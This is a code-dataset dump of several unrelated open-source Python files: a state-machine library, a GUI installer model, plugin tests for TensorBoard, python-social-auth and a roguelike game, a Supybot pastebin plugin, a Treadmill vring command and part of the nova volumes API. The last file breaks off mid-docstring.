repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
slobberchops/sordid-tools
|
refs/heads/master
|
machine/src/sordid/machine.py
|
1
|
#!/usr/bin/env python
#
# Copyright 2012 Rafe Kaplan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from sordid import util, props
class IllegalStateTransition(Exception):
pass
class State(util.SourceOrdered, props.HasProps):
name = props.ReadOnlyProperty()
machine = props.ReadOnlyProperty()
def __str__(self):
try:
return self.__string_value
except AttributeError:
name = getattr(self, 'name', None)
if name is not None:
name_value = name
else:
name_value = 'UNKNOWN'
machine = getattr(self, 'machine', None)
if machine is not None:
machine_name = machine.__name__
else:
machine_name = 'UNASSIGNED'
current_name = '%s::%s' % (machine_name, name_value)
if name is not None and machine is not None:
self.__string_value = current_name
return current_name
return self.__string_value
class Transitioner(props.HasProps):
def __init__(self, machine, transition):
self.machine = machine
self.__transition = transition
machine = props.ReadOnlyProperty()
@property
def transition(self):
return self.__transition
def __call__(self):
next_state = self.next_state
if next_state is None:
raise IllegalTransitionError(
'There is no transition %s from state %s for %s' % (
self.transition.name, current_state, self.__transition))
self.machine.state = next_state
return next_state
@property
def next_state(self):
assert self.machine is not None
return self.transition.get_next_state_from(self.machine.state)
class Transition:
def __init__(self, state_map):
super(Transition, self).__init__()
if isinstance(state_map, dict):
state_iterator = state_map.items()
else:
state_iterator = iter(state_map)
final_state_map = {}
seen_froms = set()
for froms, to in state_map.items():
if isinstance(froms, State):
froms = [froms]
for next_from in froms:
if next_from in seen_froms:
raise AssertionError('State %s is already defined for transition' %
next_from)
final_state_map[next_from] = to
self.__state_map = final_state_map
def get_next_state_from(self, state):
return self.__state_map.get(state, None)
class Machine(props.HasProps):
def __init__(self):
try:
initial_state = self.INIT
except AttributeError:
pass
else:
self.state = initial_state
for name, transition in type(self).iter_transitions():
assert transition is not None
setattr(self, name, Transitioner(self, transition))
@classmethod
def __config_props__(cls, attrs):
cls.__state_by_name = {}
cls.__transition_by_name = {}
for name, value in attrs.items():
props.config_prop(cls, name, value)
cls.state_names = sorted(cls.__state_by_name.values(),
key=lambda state: state.source_order)
if cls.__state_by_name:
first_state_name = cls.state_names[0]
try:
cls.INIT = first_state_name
except AttributeError:
pass
@classmethod
def __config_prop__(cls, name, value):
if not props.config_prop_name(cls, name, value):
if isinstance(value, State):
value.name = name
value.machine = cls
cls.__state_by_name[name] = value
if isinstance(value, Transition):
cls.__transition_by_name[name] = value
@classmethod
def lookup_state(cls, name):
return cls.__state_by_name.get(name, None)
@classmethod
def lookup_transition(cls, name):
return cls.__transition_by_name.get(name, None)
@classmethod
def iter_transitions(cls):
return cls.__transition_by_name.items()
INIT = props.ReadOnlyProperty()
state = props.ValidatedProperty(props.type_validator(State))
state_names = props.ReadOnlyProperty()
|
AOSC-Dev/IE4unix
|
refs/heads/master
|
gui/model/installer.py
|
1
|
# Defines the main GUI installer
class InstallerDefinition:
def __init__(self):
self.tabs = []
self.buttons = []
def set_title(self, title, show=True):
if show: self.title = title
return self
def set_logo(self, logo, show=True):
#TODO validates file existence
if show: self.logo = logo
return self
def tab(self, label, show = True):
tab = _Tab(label, self)
if show:
self.tabs.append(tab)
return tab
def button(self, label, img, callback):
button = _Button(label, img, callback)
self.buttons.append(button)
return self
# iteration
def checkboxes(self):
cbs = []
for tab in self.tabs:
for group in tab.groups:
for checkbox in group.checkboxes:
cbs.append(checkbox)
return cbs
def comboboxes(self):
cbs = []
for tab in self.tabs:
for group in tab.groups:
for combobox in group.comboboxes:
cbs.append(combobox)
return cbs
def textfields(self):
tfs = []
for tab in self.tabs:
for group in tab.groups:
for textfield in group.textfields:
tfs.append(textfield)
return tfs
class _Tab:
def __init__(self, label, program):
self.label = label
self.program = program
self.groups = []
def toptext(self, text, platform='all'):
self.text = text
return self
def group(self, label, show=True):
group = _Group(label, self)
if show: self.groups.append(group)
return group
def done(self):
return self.program
class _Group:
def __init__(self, label, top):
self.label = label
self.top = top
self.checkboxes = []
self.comboboxes = []
self.textfields = []
self.orientation = 'vertical'
def checkbox(self, label, command, checked=False, show=True):
checkbox = _CheckBox(label, command, checked, self)
if show: self.checkboxes.append(checkbox)
return self
def combobox(self, label, options, command, selected, show=True):
combo = _ComboBox(label, options, command, selected)
if show: self.comboboxes.append(combo)
return self
def textfield(self, label, value, command, show=True):
t = _TextField(label, value, command)
if show: self.textfields.append(t)
return self
def horizontal(self):
self.orientation = 'horizontal'
return self
def vertical(self):
self.orientation = 'vertical'
return self
def done(self):
return self.top
class _CheckBox:
def __init__(self, label, command, checked, top):
self.label = label
self.command = command
self.checked = checked
self.top = top
class _ComboBox:
def __init__(self,label, options, command, selected):
self.label = label
self.options = options.split(' ')
self.options.sort()
self.selected = selected
self.command = command
class _TextField:
def __init__(self, label, value, command):
self.label = label
self.value = value
self.command = command
class _Button:
def __init__(self, label, img, callback):
self.label = label
self.img = img
self.callback = callback
|
clef/python-social-auth
|
refs/heads/master
|
social/tests/backends/test_strava.py
|
87
|
import json
from social.tests.backends.oauth import OAuth2Test
class StravaOAuthTest(OAuth2Test):
backend_path = 'social.backends.strava.StravaOAuth'
user_data_url = 'https://www.strava.com/api/v3/athlete'
expected_username = '227615'
access_token_body = json.dumps({
"access_token": "83ebeabdec09f6670863766f792ead24d61fe3f9",
"athlete": {
"id": 227615,
"resource_state": 3,
"firstname": "John",
"lastname": "Applestrava",
"profile_medium": "http://pics.com/227615/medium.jpg",
"profile": "http://pics.com/227615/large.jpg",
"city": "San Francisco",
"state": "California",
"country": "United States",
"sex": "M",
"friend": "null",
"follower": "null",
"premium": "true",
"created_at": "2008-01-01T17:44:00Z",
"updated_at": "2013-09-04T20:00:50Z",
"follower_count": 273,
"friend_count": 19,
"mutual_friend_count": 0,
"date_preference": "%m/%d/%Y",
"measurement_preference": "feet",
"email": "john@applestrava.com",
"clubs": [],
"bikes": [],
"shoes": []
}
})
user_data_body = json.dumps({
"id": 227615,
"resource_state": 2,
"firstname": "John",
"lastname": "Applestrava",
"profile_medium": "http://pics.com/227615/medium.jpg",
"profile": "http://pics.com/227615/large.jpg",
"city": "San Francisco",
"state": "CA",
"country": "United States",
"sex": "M",
"friend": "null",
"follower": "accepted",
"premium": "true",
"created_at": "2011-03-19T21:59:57Z",
"updated_at": "2013-09-05T16:46:54Z",
"approve_followers": "false"
})
def test_login(self):
self.do_login()
def test_partial_pipeline(self):
self.do_partial_pipeline()
|
ItsLastDay/academic_university_2016-2018
|
refs/heads/master
|
subjects/SoftwareDesign/au-software_design-2017/roguelike/src/tests/test_items.py
|
1
|
import unittest
from roguelike.world.exceptions import ExitFromMapException
from roguelike.position import Position
from roguelike.world.hero import Hero
from roguelike.world.items import *
from roguelike.world.game_settings import GameSettings
class MapMock:
@staticmethod
def exit_from_map():
raise ExitFromMapException
GameSettings.current_map = MapMock
class ItemTest(unittest.TestCase):
"""Tests for items functionality"""
def setUp(self):
Hero().hp = 1
Hero().mana = 100
Hero().inventory.items = []
Hero().inventory.item_by_bodyplace = dict()
def test_use_heal_potion(self):
heal = InstantItem(InstantItemType.HEAL_POTION, Position(0, 0))
cur_hp = Hero().hp
heal.use()
self.assertEqual(cur_hp + GameSettings.HEAL_POTION_AMOUNT, Hero().hp)
def test_use_mana_potion(self):
mana = InstantItem(InstantItemType.MANA_POTION, Position(0, 0))
cur_mana = Hero().mana
mana.use()
self.assertEqual(cur_mana + GameSettings.MANA_POTION_AMOUNT, Hero().mana)
def test_use_heal_scroll(self):
heal = Spell(SpellType.HEAL, Position(0, 0))
cur_hp = Hero().hp
heal.use()
self.assertEqual(cur_hp + GameSettings.HEAL_SCROLL_AMOUNT, Hero().hp)
def test_use_teleport_scroll(self):
tp = Spell(SpellType.TELEPORT, Position(0, 0))
with self.assertRaises(ExitFromMapException):
tp.use()
def test_wear_item(self):
head = WearableItem(BodyPlace.HEAD, 1, 0, 0, 0, 0)
cur_str = Hero().strength
head.use()
inv = Hero().inventory
self.assertEqual(0, len(inv.items))
self.assertIsNotNone(inv.get_item_at_bodyplace(BodyPlace.HEAD))
self.assertEqual(cur_str + 1, Hero().strength)
def test_wear_item_then_other(self):
inv = Hero().inventory
head = WearableItem(BodyPlace.HEAD, 1, 0, 0, 0, 0)
cur_str = Hero().strength
cur_dex = Hero().dexterity
head.use()
head = WearableItem(BodyPlace.HEAD, 0, 1, 0, 0, 0)
head.use()
self.assertEqual(1, len(inv.items))
self.assertIsNotNone(inv.get_item_at_bodyplace(BodyPlace.HEAD))
self.assertEqual(cur_str, Hero().strength)
self.assertEqual(cur_dex + 1, Hero().dexterity)
|
kg-bot/SupyBot
|
refs/heads/master
|
plugins/Pastebin/plugin.py
|
1
|
###
# Copyright (c) 2005, Ali Afshar
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.world as world
import supybot.dbi as dbi
import supybot.conf as conf
import supybot.utils as utils
from supybot.commands import *
import supybot.ircmsgs as ircmsgs
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
import supybot.log as log
import os
import cgi
import time
import datetime
import cStringIO as StringIO
try:
PageModule = world.ircs[0].getCallback('Webserver').classModule
PageClass = PageModule.plugin.PluginPage
except Exception, e:
log.error('Webserver plugin must be loaded')
class Pastebin(callbacks.Plugin):
"""A pastebin including web server."""
def __init__(self, irc):
callbacks.Plugin.__init__(self, irc)
self.db = PastebinDB()
self.mostrecent = []
self.serverPlugin = irc.getCallback('Webserver')
if not self.serverPlugin:
irc.error('Webserver plugin must be running')
else:
PastebinHome.cbPastebin = self
self.serverPlugin.addSite('PasteBin', PastebinHome)
def doPaste(self, irc, cname, nick, text, ip):
date = time.time()
pid = self.db.addPaste(poster=nick, post=text, ip=ip, date=date)
self.mostrecent.append(pid)
if len(self.mostrecent) > self.registryValue('recentPasteCount'):
self.mostrecent.pop(0)
if self.registryValue('announce'):
url = '%s/%s/%s/PasteBin?view=%s' % \
(conf.supybot.plugins.Webserver.rootURL().rstrip('/'),
irc.network, cname[1:], pid)
mess = 'Pastebin: New paste by %s at %s' % \
(nick, format('%u', url))
m = ircmsgs.notice(cname, mess)
irc.sendMsg(m)
return pid
def mostRecent(self):
for pid in self.mostrecent:
yield self.db.get(pid)
def die(self):
self.serverPlugin.removeSite('paste')
class PastebinDB(object):
def __init__(self):
basedir = conf.supybot.directories.data.dirize('Pastebin')
if not os.path.exists(basedir):
os.mkdir(basedir)
dbpath = os.path.join(basedir, 'pastes.db')
self.db = dbi.DB(dbpath, Record=PastebinRecord, Mapping='cdb')
def getPaste(self, pid):
return self.db.get(pid)
def addPaste(self, **kw):
newPaste = PastebinRecord(**kw)
pid = self.db.add(newPaste)
return pid
class PastebinHome(PageClass):
isLeaf = True
def renderContent(self, request):
self.cbPlugin.log.critical('%s %s', dir(request), request.method)
segments = []
pastetext = ''
prenick = ''
if request.method == 'GET':
if 'view' in request.args and len(request.args):
pid = request.args['view'].pop()
try:
goodid = int(pid)
except ValueError:
goodid = None
if goodid:
record = self.cbPastebin.db.getPaste(goodid)
segments.append(self.renderView(request, record))
pastetext = record.post
else:
segments.append(self.renderHome(request))
else:
segments.append(self.renderHome(request))
else:
#post (we know this since no other requests ever get here)
segments.append(self.renderPost(request))
segments.append(self.renderForm(prenick, pastetext))
return ''.join(segments)
def renderView(self, request, record):
date = time.asctime(time.localtime(record.date))
lines = []
for i, line in enumerate(record.post.splitlines()):
lines.append(XHTML_LINE % (i,
cgi.escape(line).replace(' ', ' ')))
return XHTML_VIEW % (record.poster, date, ''.join(lines))
def renderHome(self, request):
T = """
<h4>Make a paste</h4>
<div>this paste will be announced in
<a href="%s">%s</a></div>
"""
return T % (self.renderURL, self.cname)
def renderRecent(self):
t = """
<div>
%s
</div>
"""
L = []
for r in self.cbPastebin.mostRecent():
L.append(r)
def renderPost(self, request):
out = {}
if 'text' in request.args and len(request.args['text'][0]):
text = request.args['text'].pop()
nick = 'Anonymous'
if 'nick' in request.args and len(request.args['nick'][0]):
nick = request.args['nick'].pop()
host = request.host.host
pid = self.cbPastebin.doPaste(self.irc, self.cname, nick, text, host)
out['success'] = 'success'
out['message'] = ('Successful Paste<br>'
'<a href="%s/PasteBin?view=%s">'
'Go to your post'
'</a>') % (self.renderURL(), pid)
else:
out['success'] = 'Failure'
out['message'] = 'You entered bad details.'
return HTML_PDONE % out
def renderForm(self, prenick, pastetext):
form = {}
form['url'] = self.renderURL()
form['prenick'] = prenick
form['pastetext'] = pastetext
return HTML_PFORM % form
HTML_PFORM = """
<br /><br />
<form action="%(url)s/PasteBin" method="post">
<div>
Name:
<input type="text" size="24" maxlength="24" name="nick"
value="%(prenick)s" />
<input type="checkbox" name="savename" />Save my name
<br />
<textarea name="text" cols="80" rows="20" wrap="off">%(pastetext)s</textarea><br />
<input type="submit" value="Make Paste"/>
</form>
</div>
"""
HTML_PDONE = """
<div class="%(success)s">
%(message)s
</div>
"""
class PastebinRecord(dbi.Record):
__fields__ = ['poster',
'ip',
'date',
'post']
def beautifyTimeDelta(delta):
L = []
if delta.days:
L.append('%s days')
else:
seconds = delta.seconds
hours, seconds = divmod(seconds, 3600)
seconds, minutes = divmod(seconds, 60)
if hours:
L.append('%s hours' % hours)
elif minutes:
L.append('%s minutes' % minutes)
else:
L.append('%s seconds' % seconds)
return ','.join(L)
Class = Pastebin
#The html templates
#could move them, but why bother?
XHTML_LINE = """
<div>
<span class="linenumber">%s</span>
<span class="line">%s</span>
</div>
"""
XHTML_VIEW = """
<div class="pasteheader">Posted by %s at %s</div>
<br />
<div>
%s
</div>
"""
XHTML_BADVIEW = """The selected paste was not found."""
XHTML_RECENT = """
<div class="recentitem">
<a href="/view?pid=%s">%s</a>
<div>
%s
</div>
</div>
"""
XHTML_PASTED = """
<div class="success">You have successfully pasted.</div>
<a href="/view?pid=%s">Go to your paste</a>
"""
XHTML_BADFORM = """
<div class="error">You failed to enter the correct for details.</div>
"""
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=78:
|
xshotD/pyglet
|
refs/heads/master
|
tests/window/EVENT_MOUSE_ENTER_LEAVE.py
|
33
|
#!/usr/bin/env python
'''Test that mouse enter and leave events work correctly.
Expected behaviour:
One window will be opened. Move the mouse in and out of this window
and ensure the events displayed are correct.
Close the window or press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import unittest
from pyglet import window
class EVENT_MOUSE_ENTER_LEAVE(unittest.TestCase):
def on_mouse_enter(self, x, y):
print 'Entered at %f, %f' % (x, y)
def on_mouse_leave(self, x, y):
print 'Left at %f, %f' % (x, y)
def test_motion(self):
w = window.Window(200, 200)
w.push_handlers(self)
while not w.has_exit:
w.dispatch_events()
w.close()
if __name__ == '__main__':
unittest.main()
|
toenuff/treadmill
|
refs/heads/master
|
lib/python/treadmill/sproc/vring.py
|
1
|
"""Treadmill vring manager."""
from __future__ import absolute_import
import signal
import sys
import logging
import yaml
import click
from .. import context
from .. import discovery
from .. import logcontext as lc
from .. import utils
from .. import vring
from .. import zkutils
_LOGGER = logging.getLogger(__name__)
def init():
"""Top level command handler."""
@click.command(name='vring')
@click.argument('manifest', type=click.File('rb'))
def vring_cmd(manifest):
"""Run vring manager."""
context.GLOBAL.zk.conn.add_listener(zkutils.exit_on_disconnect)
app = yaml.load(manifest.read())
with lc.LogContext(_LOGGER, app['name'], lc.ContainerAdapter) as log:
utils.validate(app, [('vring', True, dict)])
ring = app['vring']
utils.validate(ring, [('rules', True, list), ('cells', True,
list)])
if context.GLOBAL.cell not in ring['cells']:
log.critical('cell %s not listed in vring.',
context.GLOBAL.cell)
sys.exit(-1)
ringname = 'TM_OUTPUT_RING_%d' % ring['cells'].index(
context.GLOBAL.cell)
rules = ring['rules']
for rule in rules:
utils.validate(rule, [('pattern', True, str),
('endpoints', True, list)])
# Create translation for endpoint name to expected port #.
routing = {}
for endpoint in app.get('endpoints', []):
routing[endpoint['name']] = endpoint['port']
# Check that all ring endpoints are listed in the manifest.
vring_endpoints = set()
for rule in rules:
for rule_endpoint in rule['endpoints']:
if rule_endpoint not in routing:
log.critical(
'vring references non-existing endpoint: [%s]',
rule_endpoint)
sys.exit(-1)
vring_endpoints.add(rule_endpoint)
# TODO: discovery is limited to one rule for now.
if len(rules) != 1:
log.critical('(TODO): multiple rules are not supported.')
sys.exit(-1)
pattern = rules[0]['pattern']
app_discovery = discovery.Discovery(context.GLOBAL.zk.conn,
pattern, '*')
app_discovery.sync()
# Restore default signal mask disabled by python spawning new
# thread for Zk connection.
#
# TODO: should this be done as part of ZK connect?
for sig in range(1, signal.NSIG):
try:
signal.signal(sig, signal.SIG_DFL)
except RuntimeError:
pass
vring.init(ringname)
vring.run(ringname, routing, vring_endpoints, app_discovery)
return vring_cmd
|
unaizalakain/django
|
refs/heads/master
|
tests/migrations/faulty_migrations/namespace/foo/__init__.py
|
12133432
| |
ibrahimkarahan/Flexget
|
refs/heads/develop
|
flexget/ui/plugins/__init__.py
|
12133432
| |
gkarlin/django-jenkins
|
refs/heads/master
|
build/Django/django/conf/locale/ru/__init__.py
|
12133432
| |
marksantesson/xmldump
|
refs/heads/master
|
xmldump/__init__.py
|
12133432
| |
pk400/catering
|
refs/heads/master
|
myvenv/lib/python3.4/site-packages/django/contrib/humanize/templatetags/__init__.py
|
12133432
| |
agrubb/tensorboard
|
refs/heads/master
|
tensorboard/plugins/scalar/scalars_plugin_test.py
|
4
|
# -*- coding: utf-8 -*-
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for the Scalars Plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os.path
from six import StringIO
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorboard.backend.event_processing import plugin_event_accumulator as event_accumulator # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.scalar import scalars_plugin
from tensorboard.plugins.scalar import summary
class ScalarsPluginTest(tf.test.TestCase):
_STEPS = 99
_LEGACY_SCALAR_TAG = 'ancient-values'
_SCALAR_TAG = 'simple-values'
_HISTOGRAM_TAG = 'complicated-values'
_DISPLAY_NAME = 'Walrus population'
_DESCRIPTION = 'the *most* valuable statistic'
_HTML_DESCRIPTION = '<p>the <em>most</em> valuable statistic</p>'
_RUN_WITH_LEGACY_SCALARS = '_RUN_WITH_LEGACY_SCALARS'
_RUN_WITH_SCALARS = '_RUN_WITH_SCALARS'
_RUN_WITH_HISTOGRAM = '_RUN_WITH_HISTOGRAM'
def __init__(self, *args, **kwargs):
super(ScalarsPluginTest, self).__init__(*args, **kwargs)
self.logdir = None
self.plugin = None
def set_up_with_runs(self, run_names):
self.logdir = self.get_temp_dir()
for run_name in run_names:
self.generate_run(run_name)
multiplexer = event_multiplexer.EventMultiplexer(size_guidance={
# don't truncate my test data, please
event_accumulator.TENSORS: self._STEPS,
})
multiplexer.AddRunsFromDirectory(self.logdir)
multiplexer.Reload()
context = base_plugin.TBContext(logdir=self.logdir, multiplexer=multiplexer)
self.plugin = scalars_plugin.ScalarsPlugin(context)
def testRoutesProvided(self):
"""Tests that the plugin offers the correct routes."""
self.set_up_with_runs([self._RUN_WITH_SCALARS])
routes = self.plugin.get_plugin_apps()
self.assertIsInstance(routes['/scalars'], collections.Callable)
self.assertIsInstance(routes['/tags'], collections.Callable)
def generate_run(self, run_name):
tf.reset_default_graph()
sess = tf.Session()
placeholder = tf.placeholder(tf.float32, shape=[3])
if run_name == self._RUN_WITH_LEGACY_SCALARS:
tf.summary.scalar(self._LEGACY_SCALAR_TAG, tf.reduce_mean(placeholder))
elif run_name == self._RUN_WITH_SCALARS:
summary.op(self._SCALAR_TAG, tf.reduce_sum(placeholder),
display_name=self._DISPLAY_NAME,
description=self._DESCRIPTION)
elif run_name == self._RUN_WITH_HISTOGRAM:
tf.summary.histogram(self._HISTOGRAM_TAG, placeholder)
else:
assert False, 'Invalid run name: %r' % run_name
summ = tf.summary.merge_all()
subdir = os.path.join(self.logdir, run_name)
writer = tf.summary.FileWriter(subdir)
writer.add_graph(sess.graph)
for step in xrange(self._STEPS):
feed_dict = {placeholder: [1 + step, 2 + step, 3 + step]}
s = sess.run(summ, feed_dict=feed_dict)
writer.add_summary(s, global_step=step)
writer.close()
def test_index(self):
self.set_up_with_runs([self._RUN_WITH_LEGACY_SCALARS,
self._RUN_WITH_SCALARS,
self._RUN_WITH_HISTOGRAM])
self.assertEqual({
self._RUN_WITH_LEGACY_SCALARS: {
self._LEGACY_SCALAR_TAG: {
'displayName': self._LEGACY_SCALAR_TAG,
'description': '',
},
},
self._RUN_WITH_SCALARS: {
'%s/scalar_summary' % self._SCALAR_TAG: {
'displayName': self._DISPLAY_NAME,
'description': self._HTML_DESCRIPTION,
},
},
self._RUN_WITH_HISTOGRAM: {},
}, self.plugin.index_impl())
def _test_scalars_json(self, run_name, tag_name, should_work=True):
self.set_up_with_runs([self._RUN_WITH_LEGACY_SCALARS,
self._RUN_WITH_SCALARS,
self._RUN_WITH_HISTOGRAM])
if should_work:
(data, mime_type) = self.plugin.scalars_impl(
tag_name, run_name, scalars_plugin.OutputFormat.JSON)
self.assertEqual('application/json', mime_type)
self.assertEqual(len(data), self._STEPS)
else:
with self.assertRaises(KeyError):
self.plugin.scalars_impl(self._SCALAR_TAG, run_name,
scalars_plugin.OutputFormat.JSON)
def _test_scalars_csv(self, run_name, tag_name, should_work=True):
self.set_up_with_runs([self._RUN_WITH_LEGACY_SCALARS,
self._RUN_WITH_SCALARS,
self._RUN_WITH_HISTOGRAM])
if should_work:
(data, mime_type) = self.plugin.scalars_impl(
tag_name, run_name, scalars_plugin.OutputFormat.CSV)
self.assertEqual('text/csv', mime_type)
s = StringIO(data)
reader = csv.reader(s)
self.assertEqual(['Wall time', 'Step', 'Value'], next(reader))
self.assertEqual(len(list(reader)), self._STEPS)
else:
with self.assertRaises(KeyError):
self.plugin.scalars_impl(self._SCALAR_TAG, run_name,
scalars_plugin.OutputFormat.CSV)
def test_scalars_json_with_legacy_scalars(self):
self._test_scalars_json(self._RUN_WITH_LEGACY_SCALARS,
self._LEGACY_SCALAR_TAG)
def test_scalars_json_with_scalars(self):
self._test_scalars_json(self._RUN_WITH_SCALARS,
'%s/scalar_summary' % self._SCALAR_TAG)
def test_scalars_json_with_histogram(self):
self._test_scalars_json(self._RUN_WITH_HISTOGRAM, self._HISTOGRAM_TAG,
should_work=False)
def test_scalars_csv_with_legacy_scalars(self):
self._test_scalars_csv(self._RUN_WITH_LEGACY_SCALARS,
self._LEGACY_SCALAR_TAG)
def test_scalars_csv_with_scalars(self):
self._test_scalars_csv(self._RUN_WITH_SCALARS,
'%s/scalar_summary' % self._SCALAR_TAG)
def test_scalars_csv_with_histogram(self):
self._test_scalars_csv(self._RUN_WITH_HISTOGRAM, self._HISTOGRAM_TAG,
should_work=False)
def test_active_with_legacy_scalars(self):
self.set_up_with_runs([self._RUN_WITH_LEGACY_SCALARS])
self.assertTrue(self.plugin.is_active())
def test_active_with_scalars(self):
self.set_up_with_runs([self._RUN_WITH_SCALARS])
self.assertTrue(self.plugin.is_active())
def test_active_with_histogram(self):
self.set_up_with_runs([self._RUN_WITH_HISTOGRAM])
self.assertFalse(self.plugin.is_active())
def test_active_with_all(self):
self.set_up_with_runs([self._RUN_WITH_LEGACY_SCALARS,
self._RUN_WITH_SCALARS,
self._RUN_WITH_HISTOGRAM])
self.assertTrue(self.plugin.is_active())
if __name__ == '__main__':
tf.test.main()
|
dimid/ansible-modules-extras
|
refs/heads/devel
|
files/__init__.py
|
12133432
| |
vmturbo/nova
|
refs/heads/master
|
nova/tests/unit/api/openstack/compute/legacy_v2/__init__.py
|
12133432
| |
marook/roxappletbuilder2
|
refs/heads/master
|
framework/src/test/roxappletbuilder_test/__init__.py
|
12133432
| |
shankig/wye
|
refs/heads/master
|
wye/organisations/__init__.py
|
12133432
| |
wsyzxcn/tornado
|
refs/heads/master
|
dev/server/__init__.py
|
12133432
| |
NewpTone/stacklab-nova
|
refs/heads/master
|
nova/api/openstack/volume/volumes.py
|
5
|
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The volumes api."""
import webob
from webob import exc
from xml.dom import minidom
from nova.api.openstack import common
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import exception
from nova import flags
from nova.openstack.common import log as logging
from nova import utils
from nova import volume
from nova.volume import volume_types
LOG = logging.getLogger(__name__)
FLAGS = flags.FLAGS
def _translate_attachment_detail_view(_context, vol):
"""Maps keys for attachment details view."""
d = _translate_attachment_summary_view(_context, vol)
# No additional data / lookups at the moment
return d
def _translate_attachment_summary_view(_context, vol):
"""Maps keys for attachment summary view."""
d = {}
volume_id = vol['id']
# NOTE(justinsb): We use the volume id as the id of the attachment object
d['id'] = volume_id
d['volume_id'] = volume_id
d['server_id'] = vol['instance_uuid']
if vol.get('mountpoint'):
d['device'] = vol['mountpoint']
return d
def _translate_volume_detail_view(context, vol, image_id=None):
"""Maps keys for volumes details view."""
d = _translate_volume_summary_view(context, vol, image_id)
# No additional data / lookups at the moment
return d
def _translate_volume_summary_view(context, vol, image_id=None):
"""Maps keys for volumes summary view."""
d = {}
d['id'] = vol['id']
d['status'] = vol['status']
d['size'] = vol['size']
d['availability_zone'] = vol['availability_zone']
d['created_at'] = vol['created_at']
d['attachments'] = []
if vol['attach_status'] == 'attached':
attachment = _translate_attachment_detail_view(context, vol)
d['attachments'].append(attachment)
d['display_name'] = vol['display_name']
d['display_description'] = vol['display_description']
if vol['volume_type_id'] and vol.get('volume_type'):
d['volume_type'] = vol['volume_type']['name']
else:
# TODO(bcwaldon): remove str cast once we use uuids
d['volume_type'] = str(vol['volume_type_id'])
d['snapshot_id'] = vol['snapshot_id']
if image_id:
d['image_id'] = image_id
LOG.audit(_("vol=%s"), vol, context=context)
if vol.get('volume_metadata'):
metadata = vol.get('volume_metadata')
d['metadata'] = dict((item['key'], item['value']) for item in metadata)
else:
d['metadata'] = {}
return d
def make_attachment(elem):
elem.set('id')
elem.set('server_id')
elem.set('volume_id')
elem.set('device')
def make_volume(elem):
elem.set('id')
elem.set('status')
elem.set('size')
elem.set('availability_zone')
elem.set('created_at')
elem.set('display_name')
elem.set('display_description')
elem.set('volume_type')
elem.set('snapshot_id')
attachments = xmlutil.SubTemplateElement(elem, 'attachments')
attachment = xmlutil.SubTemplateElement(attachments, 'attachment',
selector='attachments')
make_attachment(attachment)
# Attach metadata node
elem.append(common.MetadataTemplate())
class VolumeTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volume', selector='volume')
make_volume(root)
return xmlutil.MasterTemplate(root, 1)
class VolumesTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumes')
elem = xmlutil.SubTemplateElement(root, 'volume', selector='volumes')
make_volume(elem)
return xmlutil.MasterTemplate(root, 1)
class CommonDeserializer(wsgi.MetadataXMLDeserializer):
"""Common deserializer to handle xml-formatted volume requests.
